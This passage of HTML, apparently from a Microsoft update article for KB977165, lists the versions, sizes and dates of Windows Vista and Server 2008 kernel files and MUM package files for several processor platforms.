<a bookmark-id=\"manifests\" href=\"#manifests\" managed-link=\"\" target=\"\">listed separately</a>. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.0.6000.16973</td><td class=\"sbody-td\">3,502,168</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:54</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6000.16973</td><td class=\"sbody-td\">3,467,848</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:54</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.0.6000.21175</td><td class=\"sbody-td\">3,503,704</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">22:29</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6000.21175</td><td class=\"sbody-td\">3,469,912</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">22:29</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.0.6001.18377</td><td class=\"sbody-td\">3,597,912</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:52</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6001.18377</td><td class=\"sbody-td\">3,546,200</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:52</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.0.6001.22577</td><td class=\"sbody-td\">3,600,472</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6001.22577</td><td class=\"sbody-td\">3,548,760</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:36</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.0.6002.18160</td><td class=\"sbody-td\">3,600,456</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6002.18160</td><td class=\"sbody-td\">3,548,216</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.0.6002.22283</td><td class=\"sbody-td\">3,601,464</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:14</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6002.22283</td><td class=\"sbody-td\">3,550,264</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:14</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6000.16973</td><td class=\"sbody-td\">4,425,304</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">21:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6000.21175</td><td class=\"sbody-td\">4,412,504</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">21:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6001.18377</td><td class=\"sbody-td\">4,691,032</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:59</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6001.22577</td><td class=\"sbody-td\">4,678,232</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">21:13</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6002.18160</td><td class=\"sbody-td\">4,698,184</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6002.22283</td><td class=\"sbody-td\">4,691,528</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:05</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6001.18377</td><td class=\"sbody-td\">9,491,544</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:32</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6001.22577</td><td class=\"sbody-td\">9,485,912</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:50</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6002.18160</td><td class=\"sbody-td\">9,469,000</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:11</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.0.6002.22283</td><td class=\"sbody-td\">9,463,368</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">20:09</td><td class=\"sbody-td\">IA-64</td></tr></table></div><h3 class=\"sbody-h3\">Additional file information for Windows Vista and Windows Server 2008</h3><a class=\"bookmark\" id=\"manifests\"></a><h4 class=\"sbody-h4\">Additional files for all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,744</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,447</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,907</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,614</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,749</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,452</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,749</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,454</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,383</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,104</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,226</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,942</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_7_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,226</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_7_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,942</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_8_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,750</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_8_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,454</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_9_for_kb977165_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,745</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_9_for_kb977165~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,449</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_0_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_0~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_1_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,357</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_1~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,376</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_2_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,676</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_2~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,703</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,961</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_client~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,004</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_0_bf~31bf3856ad364e35~x86~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,411</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td 